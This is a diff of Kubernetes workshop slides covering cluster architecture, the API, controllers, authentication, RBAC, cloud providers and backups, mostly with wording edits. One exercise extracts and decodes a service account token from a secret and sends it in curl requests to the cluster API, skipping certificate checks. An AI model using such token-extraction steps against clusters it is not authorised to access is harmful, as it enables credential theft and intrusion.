||||
|
||||
- on a dedicated set of nodes
|
||||
|
||||
(example: Kubernetes The Hard Way; kops)
|
||||
|
||||
- outside of the cluster
|
||||
|
||||
(example: most managed clusters like AKS, EKS, GKE)
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
## What runs on a node
|
||||
|
||||
- Our containerized workloads
|
||||
|
||||
- A container engine like Docker, CRI-O, containerd...
|
||||
|
||||
(in theory, the choice doesn't matter, as the engine is abstracted by Kubernetes)
|
||||
|
||||
- kubelet: an agent connecting the node to the cluster
|
||||
|
||||
(it connects to the API server, registers the node, receives instructions)
|
||||
|
||||
- kube-proxy: a component used for internal cluster communication
|
||||
|
||||
(note that this is *not* an overlay network or a CNI plugin!)
|
||||
|
||||
---
|
||||
|
||||
## What's in the control plane
|
||||
|
||||
- Everything is stored in etcd
|
||||
|
||||
(it's the only stateful component)
|
||||
|
||||
- Everyone communicates exclusively through the API server:
|
||||
|
||||
- we (users) interact with the cluster through the API server
|
||||
|
||||
- the nodes register and get their instructions through the API server
|
||||
|
||||
- the other control plane components also register with the API server
|
||||
|
||||
- API server is the only component that reads/writes from/to etcd
|
||||
|
||||
---
|
||||
|
||||
## Communication protocols: API server
|
||||
|
||||
- The API server exposes a REST API
|
||||
|
||||
(except for some calls, e.g. to attach interactively to a container)
|
||||
|
||||
- Almost all requests and responses are JSON following a strict format
|
||||
|
||||
- For performance, the requests and responses can also be done over protobuf
|
||||
|
||||
(see this [design proposal](https://github.com/kubernetes/community/blob/master/contributors/design-proposals/api-machinery/protobuf.md) for details)
|
||||
|
||||
- In practice, protobuf is used for all internal communication
|
||||
|
||||
(between control plane components, and with kubelet)
|
||||
|
||||
---
|
||||
|
||||
## Communication protocols: on the nodes
|
||||
|
||||
The kubelet agent uses a number of special-purpose protocols and interfaces, including:
|
||||
|
||||
- CRI (Container Runtime Interface)
|
||||
|
||||
- used for communication with the container engine
|
||||
- abstracts the differences between container engines
|
||||
- based on gRPC+protobuf
|
||||
|
||||
- [CNI (Container Network Interface)](https://github.com/containernetworking/cni/blob/master/SPEC.md)
|
||||
|
||||
- used for communication with network plugins
|
||||
- network plugins are implemented as executable programs invoked by kubelet
|
||||
- network plugins provide IPAM
|
||||
- network plugins set up network interfaces in pods
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
# The Kubernetes API
|
||||
|
||||
[
|
||||
*The Kubernetes API server is a "dumb server" which offers storage, versioning, validation, update, and watch semantics on API resources.*
|
||||
](
|
||||
https://github.com/kubernetes/community/blob/master/contributors/design-proposals/api-machinery/protobuf.md#proposal-and-motivation
|
||||
)
|
||||
|
||||
([Clayton Coleman](https://twitter.com/smarterclayton), Kubernetes Architect and Maintainer)
|
||||
|
||||
What does that mean?
|
||||
|
||||
---
|
||||
|
||||
## The Kubernetes API is declarative
|
||||
|
||||
- We cannot tell the API, "run a pod"
|
||||
|
||||
- We can tell the API, "here is the definition for pod X"
|
||||
|
||||
- The API server will store that definition (in etcd)
|
||||
|
||||
- *Controllers* will then wake up and create a pod matching the definition
|
||||
|
||||
---
|
||||
|
||||
## The core features of the Kubernetes API
|
||||
|
||||
- We can create, read, update, and delete objects
|
||||
|
||||
- We can also *watch* objects
|
||||
|
||||
(be notified when an object changes, or when an object of a given type is created)
|
||||
|
||||
- Objects are strongly typed
|
||||
|
||||
- Types are *validated* and *versioned*
|
||||
|
||||
- Storage and watch operations are provided by etcd
|
||||
|
||||
(note: the [k3s](https://k3s.io/) project allows us to use sqlite instead of etcd)
|
||||
|
||||
---
|
||||
|
||||
## Let's experiment a bit!
|
||||
|
||||
- For the exercises in this section, you'll be using `kubectl` locally and connecting to an AKS cluster
|
||||
|
||||
.exercise[
|
||||
|
||||
- Get cluster info
|
||||
```bash
|
||||
kubectl cluster-info
|
||||
```
|
||||
- Check that the cluster is operational:
|
||||
```bash
|
||||
kubectl get nodes
|
||||
```
|
||||
|
||||
- All nodes should be `Ready`
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Create
|
||||
|
||||
- Let's create a simple object
|
||||
|
||||
.exercise[
|
||||
|
||||
- List existing namespaces:
|
||||
```bash
|
||||
kubectl get ns
|
||||
```
|
||||
|
||||
- Create a new namespace with the following command:
|
||||
```bash
|
||||
kubectl create -f- <<EOF
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: hello
|
||||
EOF
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
This is equivalent to `kubectl create namespace hello`.
|
||||
|
||||
---
|
||||
|
||||
## Read
|
||||
|
||||
- Let's retrieve the object we just created
|
||||
|
||||
.exercise[
|
||||
|
||||
- Read back our object:
|
||||
```bash
|
||||
kubectl get namespace hello -o yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
We see a lot of data that wasn't here when we created the object.
|
||||
|
||||
Some data was automatically added to the object (like `spec.finalizers`).
|
||||
|
||||
Some data is dynamic (typically, the content of `status`.)
|
||||
|
||||
---
|
||||
|
||||
## API requests and responses
|
||||
|
||||
- Almost every Kubernetes API payload (requests and responses) has the same format:
|
||||
```yaml
|
||||
apiVersion: xxx
|
||||
kind: yyy
|
||||
metadata:
|
||||
name: zzz
|
||||
(more metadata fields here)
|
||||
(more fields here)
|
||||
```
|
||||
|
||||
- The fields shown above are mandatory, except for some special cases
|
||||
|
||||
(e.g.: in lists of resources, the list itself doesn't have a `metadata.name`)
|
||||
|
||||
- We show YAML for convenience, but the API uses JSON
|
||||
|
||||
(with optional protobuf encoding)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## API versions
|
||||
|
||||
- The `apiVersion` field corresponds to an *API group*
|
||||
|
||||
- It can be either `v1` (aka "core" group or "legacy group"), or `group/versions`; e.g.:
|
||||
|
||||
- `apps/v1`
|
||||
- `rbac.authorization.k8s.io/v1`
|
||||
- `extensions/v1beta1`
|
||||
|
||||
- It does not indicate which version of Kubernetes we're talking about
|
||||
|
||||
- It *indirectly* indicates the version of the `kind`
|
||||
|
||||
(which fields exist, their format, which ones are mandatory...)
|
||||
|
||||
- A single resource type (`kind`) is rarely versioned alone
|
||||
|
||||
(e.g.: the `batch` API group contains `jobs` and `cronjobs`)
|
||||
|
||||
---
|
||||
|
||||
## Update
|
||||
|
||||
- Let's update our namespace object
|
||||
|
||||
- There are many ways to do that, including:
|
||||
|
||||
- `kubectl apply` (and provide an updated YAML file)
|
||||
- `kubectl edit`
|
||||
- `kubectl patch`
|
||||
- many helpers, like `kubectl label`, or `kubectl set`
|
||||
|
||||
- In each case, `kubectl` will:
|
||||
|
||||
- get the current definition of the object
|
||||
- compute changes
|
||||
- submit the changes (with `PATCH` requests)
|
||||
|
||||
---
|
||||
|
||||
## Adding a label
|
||||
|
||||
- For demonstration purposes, let's add a label to the namespace
|
||||
|
||||
- The easiest way is to use `kubectl label`
|
||||
|
||||
.exercise[
|
||||
|
||||
- In one terminal, watch namespaces:
|
||||
```bash
|
||||
kubectl get namespaces --show-labels -w
|
||||
```
|
||||
|
||||
- In the other, update our namespace:
|
||||
```bash
|
||||
kubectl label namespaces hello color=purple
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
We demonstrated *update* and *watch* semantics.
|
||||
|
||||
---
|
||||
|
||||
## What's special about *watch*?
|
||||
|
||||
- The API server itself doesn't do anything: it's just a fancy object store
|
||||
|
||||
- All the actual logic in Kubernetes is implemented with *controllers*
|
||||
|
||||
- A *controller* watches a set of resources, and takes action when they change
|
||||
|
||||
- Examples:
|
||||
|
||||
- when a Pod object is created, it gets scheduled and started
|
||||
|
||||
- when a Pod belonging to a ReplicaSet terminates, it gets replaced
|
||||
|
||||
- when a Deployment object is updated, it can trigger a rolling update
|
||||
|
||||
---
|
||||
|
||||
# Other control plane components
|
||||
|
||||
- API server ✔️
|
||||
|
||||
- etcd ✔️
|
||||
|
||||
- Controller manager
|
||||
|
||||
- Scheduler
|
||||
|
||||
---
|
||||
|
||||
## Controller manager
|
||||
|
||||
- This is a collection of loops watching all kinds of objects
|
||||
|
||||
- That's where the actual logic of Kubernetes lives
|
||||
|
||||
- When we create a Deployment (e.g. with `kubectl run web --image=nginx`),
|
||||
|
||||
- we create a Deployment object
|
||||
|
||||
- the Deployment controller notices it, and creates a ReplicaSet
|
||||
|
||||
- the ReplicaSet controller notices the ReplicaSet, and creates a Pod
|
||||
|
||||
---
|
||||
|
||||
## Scheduler
|
||||
|
||||
- When a pod is created, it is in `Pending` state
|
||||
|
||||
- The scheduler (or rather: *a scheduler*) must bind it to a node
|
||||
|
||||
- Kubernetes comes with an efficient scheduler with many features
|
||||
|
||||
- if we have special requirements, we can add another scheduler
|
||||
<br/>
|
||||
(example: this [demo scheduler](https://github.com/kelseyhightower/scheduler) uses the cost of nodes, stored in node annotations)
|
||||
|
||||
- A pod might stay in `Pending` state for a long time:
|
||||
|
||||
- if the cluster is full
|
||||
|
||||
- if the pod has special constraints that can't be met
|
||||
|
||||
- if the scheduler is not running (!)
|
||||
@@ -356,9 +356,9 @@ We demonstrated *update* and *watch* semantics.
|
||||
|
||||
- we create a Deployment object
|
||||
|
||||
- the Deployment controller notices it, and creates a ReplicaSet
|
||||
- the Deployment controller notices it, creates a ReplicaSet
|
||||
|
||||
- the ReplicaSet controller notices the ReplicaSet, and creates a Pod
|
||||
- the ReplicaSet controller notices it, creates a Pod
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -1,319 +0,0 @@
|
||||
# Authentication and authorization
|
||||
|
||||
*And first, a little refresher!*
|
||||
|
||||
- Authentication = verifying the identity of a person
|
||||
|
||||
On a UNIX system, we can authenticate with login+password, SSH keys ...
|
||||
|
||||
- Authorization = listing what they are allowed to do
|
||||
|
||||
On a UNIX system, this can include file permissions, sudoer entries ...
|
||||
|
||||
- Sometimes abbreviated as "authn" and "authz"
|
||||
|
||||
- In good modular systems, these things are decoupled
|
||||
|
||||
(so we can e.g. change a password or SSH key without having to reset access rights)
|
||||
|
||||
---
|
||||
|
||||
## Authentication in Kubernetes
|
||||
|
||||
- When the API server receives a request, it tries to authenticate it
|
||||
|
||||
(it examines headers, certificates... anything available)
|
||||
|
||||
- Many authentication methods are available and can be used simultaneously
|
||||
|
||||
(we will see them on the next slide)
|
||||
|
||||
- It's the job of the authentication method to produce:
|
||||
|
||||
- the user name
|
||||
- the user ID
|
||||
- a list of groups
|
||||
|
||||
- The API server doesn't interpret these; that'll be the job of *authorizers*
|
||||
|
||||
---
|
||||
|
||||
## Authentication methods
|
||||
|
||||
- TLS client certificates
|
||||
|
||||
(that's what we've been doing with `kubectl` so far)
|
||||
|
||||
- Bearer tokens
|
||||
|
||||
(a secret token in the HTTP headers of the request)
|
||||
|
||||
- [HTTP basic auth](https://en.wikipedia.org/wiki/Basic_access_authentication)
|
||||
|
||||
(carrying user and password in an HTTP header)
|
||||
|
||||
- Authentication proxy
|
||||
|
||||
(sitting in front of the API and setting trusted headers)
|
||||
|
||||
---
|
||||
|
||||
## Anonymous & unauthenticated requests
|
||||
|
||||
- If any authentication method *rejects* a request, it's denied
|
||||
|
||||
(`401 Unauthorized` HTTP code)
|
||||
|
||||
- If a request is neither rejected nor accepted by anyone, it's anonymous
|
||||
|
||||
- the user name is `system:anonymous`
|
||||
|
||||
- the list of groups is `[system:unauthenticated]`
|
||||
|
||||
- By default, the anonymous user can't do anything
|
||||
|
||||
|
||||
.exercise[
|
||||
|
||||
- Note that 401 (not 403) is what you get if you just `curl` the Kubernetes API
|
||||
```bash
|
||||
curl -k $API_URL
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Authentication with tokens
|
||||
|
||||
- Tokens are passed as HTTP headers:
|
||||
|
||||
`Authorization: Bearer and-then-here-comes-the-token`
|
||||
|
||||
- Tokens can be validated through a number of different methods:
|
||||
|
||||
- static tokens hard-coded in a file on the API server
|
||||
|
||||
- [bootstrap tokens](https://kubernetes.io/docs/reference/access-authn-authz/bootstrap-tokens/) (special case to create a cluster or join nodes)
|
||||
|
||||
- [OpenID Connect tokens](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#openid-connect-tokens) (to delegate authentication to compatible OAuth2 providers)
|
||||
|
||||
- service accounts (these deserve more details, coming right up!)
|
||||
|
||||
---
|
||||
|
||||
## Service accounts
|
||||
|
||||
- A service account is a user that exists in the Kubernetes API
|
||||
|
||||
(it is visible with e.g. `kubectl get serviceaccounts`)
|
||||
|
||||
- Service accounts can therefore be created / updated dynamically
|
||||
|
||||
(they don't require hand-editing a file and restarting the API server)
|
||||
|
||||
- A service account is associated with a set of secrets
|
||||
|
||||
(the kind that you can view with `kubectl get secrets`)
|
||||
|
||||
- Service accounts are generally used to grant permissions to applications, services...
|
||||
|
||||
(as opposed to humans)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Token authentication in practice
|
||||
|
||||
- We are going to list existing service accounts
|
||||
|
||||
- Then we will extract the token for a given service account
|
||||
|
||||
- And we will use that token to authenticate with the API
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Listing service accounts
|
||||
|
||||
.exercise[
|
||||
|
||||
- The resource name is `serviceaccount` or `sa` for short:
|
||||
```bash
|
||||
kubectl get sa
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
There should be just one service account in the default namespace: `default`.
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Finding the secret
|
||||
|
||||
.exercise[
|
||||
|
||||
- List the secrets for the `default` service account:
|
||||
```bash
|
||||
kubectl get sa default -o yaml
|
||||
SECRET=$(kubectl get sa default -o json | jq -r .secrets[0].name)
|
||||
echo $SECRET
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
It should be named `default-token-XXXXX`.
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Extracting the token
|
||||
|
||||
- The token is stored in the secret, wrapped with base64 encoding
|
||||
|
||||
.exercise[
|
||||
|
||||
- View the secret:
|
||||
```bash
|
||||
kubectl get secret $SECRET -o yaml
|
||||
```
|
||||
|
||||
- Extract the token and decode it:
|
||||
```bash
|
||||
TOKEN=$(kubectl get secret $SECRET -o json \
|
||||
| jq -r .data.token | openssl base64 -d -A)
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Using the token
|
||||
|
||||
- Let's send a request to the API, without and with the token
|
||||
|
||||
.exercise[
|
||||
|
||||
- Find the URL for the `kubernetes` master:
|
||||
```bash
|
||||
kubectl cluster-info
|
||||
```
|
||||
- Set it programmatically, if AKS_NAME is set: (choose from `kubectl config view`):
|
||||
```bash
|
||||
API=$(kubectl config view -o \
|
||||
jsonpath="{.clusters[?(@.name==\"$AKS_NAME\")].cluster.server}")
|
||||
```
|
||||
- Connect without the token, then with the token::
|
||||
```bash
|
||||
curl -k $API
|
||||
curl -k -H "Authorization: Bearer $TOKEN" $API
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Authorization in Kubernetes
|
||||
|
||||
- There are multiple ways to grant permissions in Kubernetes, called [authorizers](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#authorization-modules):
|
||||
|
||||
- [Node Authorization](https://kubernetes.io/docs/reference/access-authn-authz/node/) (used internally by kubelet; we can ignore it)
|
||||
|
||||
- [Attribute-based access control](https://kubernetes.io/docs/reference/access-authn-authz/abac/) (powerful but complex and static; ignore it too)
|
||||
|
||||
- [Webhook](https://kubernetes.io/docs/reference/access-authn-authz/webhook/) (each API request is submitted to an external service for approval)
|
||||
|
||||
- [Role-based access control](https://kubernetes.io/docs/reference/access-authn-authz/rbac/) (associates permissions to users dynamically)
|
||||
|
||||
- The one we want is the last one, generally abbreviated as RBAC
|
||||
|
||||
---
|
||||
|
||||
## Role-based access control
|
||||
|
||||
- RBAC allows to specify fine-grained permissions
|
||||
|
||||
- Permissions are expressed as *rules*
|
||||
|
||||
- A rule is a combination of:
|
||||
|
||||
- [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb) like create, get, list, update, delete...
|
||||
|
||||
- resources (as in "API resource," like pods, nodes, services...)
|
||||
|
||||
- resource names (to specify e.g. one specific pod instead of all pods)
|
||||
|
||||
- in some case, [subresources](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#referring-to-resources) (e.g. logs are subresources of pods)
|
||||
|
||||
---
|
||||
|
||||
## From rules to roles to rolebindings
|
||||
|
||||
- A *role* is an API object containing a list of *rules*
|
||||
|
||||
Example: role "external-load-balancer-configurator" can:
|
||||
- [list, get] resources [endpoints, services, pods]
|
||||
- [update] resources [services]
|
||||
|
||||
- A *rolebinding* associates a role with a user
|
||||
|
||||
Example: rolebinding "external-load-balancer-configurator":
|
||||
- associates user "external-load-balancer-configurator"
|
||||
- with role "external-load-balancer-configurator"
|
||||
|
||||
- Yes, there can be users, roles, and rolebindings with the same name
|
||||
|
||||
- It's a good idea for 1-1-1 bindings; not so much for 1-N ones
|
||||
|
||||
---
|
||||
|
||||
## Cluster-scope permissions
|
||||
|
||||
- API resources Role and RoleBinding are for objects within a namespace
|
||||
|
||||
- We can also define API resources ClusterRole and ClusterRoleBinding
|
||||
|
||||
- These are a superset, allowing us to:
|
||||
|
||||
- specify actions on cluster-wide objects (like nodes)
|
||||
|
||||
- operate across all namespaces
|
||||
|
||||
- We can create Role and RoleBinding resources within a namespace
|
||||
|
||||
- ClusterRole and ClusterRoleBinding resources are global
|
||||
|
||||
---
|
||||
|
||||
## Pods and service accounts
|
||||
|
||||
- A pod can be associated with a service account
|
||||
|
||||
- by default, it is associated with the `default` service account
|
||||
|
||||
- as we saw earlier, this service account has no permissions anyway
|
||||
|
||||
- The associated token is exposed to the pod's filesystem
|
||||
|
||||
(in `/var/run/secrets/kubernetes.io/serviceaccount/token`)
|
||||
|
||||
- Standard Kubernetes tooling (like `kubectl`) will look for it there
|
||||
|
||||
- So Kubernetes tools running in a pod will automatically use the service account
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Pod Security Policies
|
||||
|
||||
- If you'd like to check out pod-level controls in AKS, they are [available in preview](https://docs.microsoft.com/en-us/azure/aks/use-pod-security-policies)
|
||||
|
||||
- Experiment, but not in production!
|
||||
@@ -22,7 +22,7 @@
|
||||
|
||||
- When the API server receives a request, it tries to authenticate it
|
||||
|
||||
(it examines headers, certificates... anything available)
|
||||
(it examines headers, certificates ... anything available)
|
||||
|
||||
- Many authentication methods are available and can be used simultaneously
|
||||
|
||||
@@ -34,7 +34,7 @@
|
||||
- the user ID
|
||||
- a list of groups
|
||||
|
||||
- The API server doesn't interpret these; that'll be the job of *authorizers*
|
||||
- The API server doesn't interpret these; it'll be the job of *authorizers*
|
||||
|
||||
---
|
||||
|
||||
@@ -50,7 +50,7 @@
|
||||
|
||||
- [HTTP basic auth](https://en.wikipedia.org/wiki/Basic_access_authentication)
|
||||
|
||||
(carrying user and password in an HTTP header)
|
||||
(carrying user and password in a HTTP header)
|
||||
|
||||
- Authentication proxy
|
||||
|
||||
@@ -88,7 +88,7 @@
|
||||
|
||||
(i.e. they are not stored in etcd or anywhere else)
|
||||
|
||||
- Users can be created (and added to groups) independently of the API
|
||||
- Users can be created (and given membership to groups) independently of the API
|
||||
|
||||
- The Kubernetes API can be set up to use your custom CA to validate client certs
|
||||
|
||||
@@ -143,21 +143,19 @@ class: extra-details
|
||||
|
||||
(see issue [#18982](https://github.com/kubernetes/kubernetes/issues/18982))
|
||||
|
||||
- As a result, we don't have an easy way to terminate someone's access
|
||||
- As a result, we cannot easily suspend a user's access
|
||||
|
||||
(if their key is compromised, or they leave the organization)
|
||||
- There are workarounds, but they are very inconvenient:
|
||||
|
||||
- Option 1: re-create a new CA and re-issue everyone's certificates
|
||||
<br/>
|
||||
→ Maybe OK if we only have a few users; no way otherwise
|
||||
- issue short-lived certificates (e.g. 24 hours) and regenerate them often
|
||||
|
||||
- Option 2: don't use groups; grant permissions to individual users
|
||||
<br/>
|
||||
→ Inconvenient if we have many users and teams; error-prone
|
||||
- re-create the CA and re-issue all certificates in case of compromise
|
||||
|
||||
- Option 3: issue short-lived certificates (e.g. 24 hours) and renew them often
|
||||
<br/>
|
||||
→ This can be facilitated by e.g. Vault or by the Kubernetes CSR API
|
||||
- grant permissions to individual users, not groups
|
||||
<br/>
|
||||
(and remove all permissions to a compromised user)
|
||||
|
||||
- Until this is fixed, we probably want to use other methods
|
||||
|
||||
---
|
||||
|
||||
@@ -193,7 +191,7 @@ class: extra-details
|
||||
|
||||
(the kind that you can view with `kubectl get secrets`)
|
||||
|
||||
- Service accounts are generally used to grant permissions to applications, services...
|
||||
- Service accounts are generally used to grant permissions to applications, services ...
|
||||
|
||||
(as opposed to humans)
|
||||
|
||||
@@ -217,7 +215,7 @@ class: extra-details
|
||||
|
||||
.exercise[
|
||||
|
||||
- The resource name is `serviceaccount` or `sa` for short:
|
||||
- The resource name is `serviceaccount` or `sa` in short:
|
||||
```bash
|
||||
kubectl get sa
|
||||
```
|
||||
@@ -309,7 +307,7 @@ class: extra-details
|
||||
|
||||
- The API "sees" us as a different user
|
||||
|
||||
- But neither user has any rights, so we can't do nothin'
|
||||
- But neither user has any right, so we can't do nothin'
|
||||
|
||||
- Let's change that!
|
||||
|
||||
@@ -339,9 +337,9 @@ class: extra-details
|
||||
|
||||
- A rule is a combination of:
|
||||
|
||||
- [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb) like create, get, list, update, delete...
|
||||
- [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb) like create, get, list, update, delete ...
|
||||
|
||||
- resources (as in "API resource," like pods, nodes, services...)
|
||||
- resources (as in "API resource", like pods, nodes, services ...)
|
||||
|
||||
- resource names (to specify e.g. one specific pod instead of all pods)
|
||||
|
||||
@@ -375,13 +373,13 @@ class: extra-details
|
||||
|
||||
- We can also define API resources ClusterRole and ClusterRoleBinding
|
||||
|
||||
- These are a superset, allowing us to:
|
||||
- These are a superset, allowing to:
|
||||
|
||||
- specify actions on cluster-wide objects (like nodes)
|
||||
|
||||
- operate across all namespaces
|
||||
|
||||
- We can create Role and RoleBinding resources within a namespace
|
||||
- We can create Role and RoleBinding resources within a namespaces
|
||||
|
||||
- ClusterRole and ClusterRoleBinding resources are global
|
||||
|
||||
@@ -389,13 +387,13 @@ class: extra-details
|
||||
|
||||
## Pods and service accounts
|
||||
|
||||
- A pod can be associated with a service account
|
||||
- A pod can be associated to a service account
|
||||
|
||||
- by default, it is associated with the `default` service account
|
||||
- by default, it is associated to the `default` service account
|
||||
|
||||
- as we saw earlier, this service account has no permissions anyway
|
||||
- as we've seen earlier, this service account has no permission anyway
|
||||
|
||||
- The associated token is exposed to the pod's filesystem
|
||||
- The associated token is exposed into the pod's filesystem
|
||||
|
||||
(in `/var/run/secrets/kubernetes.io/serviceaccount/token`)
|
||||
|
||||
@@ -409,7 +407,7 @@ class: extra-details
|
||||
|
||||
- We are going to create a service account
|
||||
|
||||
- We will use a default cluster role (`view`)
|
||||
- We will use an existing cluster role (`view`)
|
||||
|
||||
- We will bind together this role and this service account
|
||||
|
||||
@@ -460,7 +458,7 @@ class: extra-details
|
||||
|
||||
]
|
||||
|
||||
It's important to note a couple of details in these flags...
|
||||
It's important to note a couple of details in these flags ...
|
||||
|
||||
---
|
||||
|
||||
@@ -493,13 +491,13 @@ It's important to note a couple of details in these flags...
|
||||
|
||||
- again, the command would have worked fine (no error)
|
||||
|
||||
- ...but our API requests would have been denied later
|
||||
- ... but our API requests would have been denied later
|
||||
|
||||
- What's about the `default:` prefix?
|
||||
|
||||
- that's the namespace of the service account
|
||||
|
||||
- yes, it could be inferred from context, but... `kubectl` requires it
|
||||
- yes, it could be inferred from context, but ... `kubectl` requires it
|
||||
|
||||
---
|
||||
|
||||
@@ -576,51 +574,6 @@ It's important to note a couple of details in these flags...
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Where does this `view` role come from?
|
||||
|
||||
- Kubernetes defines a number of ClusterRoles intended to be bound to users
|
||||
|
||||
- `cluster-admin` can do *everything* (think `root` on UNIX)
|
||||
|
||||
- `admin` can do *almost everything* (except e.g. changing resource quotas and limits)
|
||||
|
||||
- `edit` is similar to `admin`, but cannot view or edit permissions
|
||||
|
||||
- `view` has read-only access to most resources, except permissions and secrets
|
||||
|
||||
*In many situations, these roles will be all you need.*
|
||||
|
||||
*You can also customize them!*
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Customizing the default roles
|
||||
|
||||
- If you need to *add* permissions to these default roles (or others),
|
||||
<br/>
|
||||
you can do it through the [ClusterRole Aggregation](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#aggregated-clusterroles) mechanism
|
||||
|
||||
- This happens by creating a ClusterRole with the following labels:
|
||||
```yaml
|
||||
metadata:
|
||||
labels:
|
||||
rbac.authorization.k8s.io/aggregate-to-admin: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-edit: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-view: "true"
|
||||
```
|
||||
|
||||
- This ClusterRole permissions will be added to `admin`/`edit`/`view` respectively
|
||||
|
||||
- This is particulary useful when using CustomResourceDefinitions
|
||||
|
||||
(since Kubernetes cannot guess which resources are sensitive and which ones aren't)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Where do our permissions come from?
|
||||
|
||||
- When interacting with the Kubernetes API, we are using a client certificate
|
||||
@@ -652,7 +605,7 @@ class: extra-details
|
||||
kubectl describe clusterrolebinding cluster-admin
|
||||
```
|
||||
|
||||
- This binding associates `system:masters` with the cluster role `cluster-admin`
|
||||
- This binding associates `system:masters` to the cluster role `cluster-admin`
|
||||
|
||||
- And the `cluster-admin` is, basically, `root`:
|
||||
```bash
|
||||
@@ -667,7 +620,7 @@ class: extra-details
|
||||
|
||||
- For auditing purposes, sometimes we want to know who can perform an action
|
||||
|
||||
- There is a proof-of-concept tool by Aqua Security which does exactly that:
|
||||
- Here is a proof-of-concept tool by Aqua Security, doing exactly that:
|
||||
|
||||
https://github.com/aquasecurity/kubectl-who-can
|
||||
|
||||
|
||||
@@ -20,15 +20,15 @@
|
||||
|
||||
- Configuring routing tables in the cloud network (specific to GCE)
|
||||
|
||||
- Updating node labels to indicate region, zone, instance type...
|
||||
- Updating node labels to indicate region, zone, instance type ...
|
||||
|
||||
- Obtain node name, internal and external addresses from cloud metadata service
|
||||
|
||||
- Deleting nodes from Kubernetes when they're deleted in the cloud
|
||||
|
||||
- Managing *some* volumes (e.g. ELBs, AzureDisks...)
|
||||
- Managing *some* volumes (e.g. ELBs, AzureDisks ...)
|
||||
|
||||
(Eventually, volumes will be managed by the Container Storage Interface)
|
||||
(Eventually, volumes will be managed by the CSI)
|
||||
|
||||
---
|
||||
|
||||
@@ -83,7 +83,7 @@ The list includes the following providers:
|
||||
|
||||
## Audience questions
|
||||
|
||||
- What kind of clouds are you using/planning to use?
|
||||
- What kind of clouds are you using / planning to use?
|
||||
|
||||
- What kind of details would you like to see in this section?
|
||||
|
||||
@@ -105,7 +105,7 @@ The list includes the following providers:
|
||||
|
||||
- When using managed clusters, this is done automatically
|
||||
|
||||
- There is very little documentation on writing the configuration file
|
||||
- There is very little documentation to write the configuration file
|
||||
|
||||
(except for OpenStack)
|
||||
|
||||
@@ -123,7 +123,7 @@ The list includes the following providers:
|
||||
|
||||
- To get these addresses, the node needs to communicate with the control plane
|
||||
|
||||
- ...Which means joining the cluster
|
||||
- ... Which means joining the cluster
|
||||
|
||||
(The problem didn't occur when cloud-specific code was running in kubelet: kubelet could obtain the required information directly from the cloud provider's metadata service.)
|
||||
|
||||
|
||||
@@ -6,7 +6,7 @@
|
||||
|
||||
- error recovery (human or process has altered or corrupted data)
|
||||
|
||||
- cloning environments (for testing, validation...)
|
||||
- cloning environments (for testing, validation ...)
|
||||
|
||||
- Let's see the strategies and tools available with Kubernetes!
|
||||
|
||||
@@ -18,13 +18,13 @@
|
||||
|
||||
(it gives us replication primitives)
|
||||
|
||||
- Kubernetes helps us clone / replicate environments
|
||||
- Kubernetes helps us to clone / replicate environments
|
||||
|
||||
(all resources can be described with manifests)
|
||||
|
||||
- Kubernetes *does not* help us with error recovery
|
||||
|
||||
- We still need to back up/snapshot our data:
|
||||
- We still need to backup / snapshot our data:
|
||||
|
||||
- with database backups (mysqldump, pgdump, etc.)
|
||||
|
||||
@@ -58,7 +58,7 @@
|
||||
|
||||
- If our deployment system isn't fully automated, it should at least be documented
|
||||
|
||||
- Litmus test: how long does it take to deploy a cluster...
|
||||
- Litmus test: how long does it take to deploy a cluster ...
|
||||
|
||||
- for a senior engineer?
|
||||
|
||||
@@ -66,7 +66,7 @@
|
||||
|
||||
- Does it require external intervention?
|
||||
|
||||
(e.g. provisioning servers, signing TLS certs...)
|
||||
(e.g. provisioning servers, signing TLS certs ...)
|
||||
|
||||
---
|
||||
|
||||
@@ -108,7 +108,7 @@
|
||||
|
||||
- For real applications: add resources (as YAML files)
|
||||
|
||||
- For applications deployed multiple times: Helm, Kustomize...
|
||||
- For applications deployed multiple times: Helm, Kustomize ...
|
||||
|
||||
(staging and production count as "multiple times")
|
||||
|
||||
|
||||
@@ -1,167 +0,0 @@
|
||||
# Cluster sizing
|
||||
|
||||
- What happens when the cluster gets full?
|
||||
|
||||
- How can we scale up the cluster?
|
||||
|
||||
- Can we do it automatically?
|
||||
|
||||
- What are other methods to address capacity planning?
|
||||
|
||||
---
|
||||
|
||||
## When are we out of resources?
|
||||
|
||||
- kubelet monitors node resources:
|
||||
|
||||
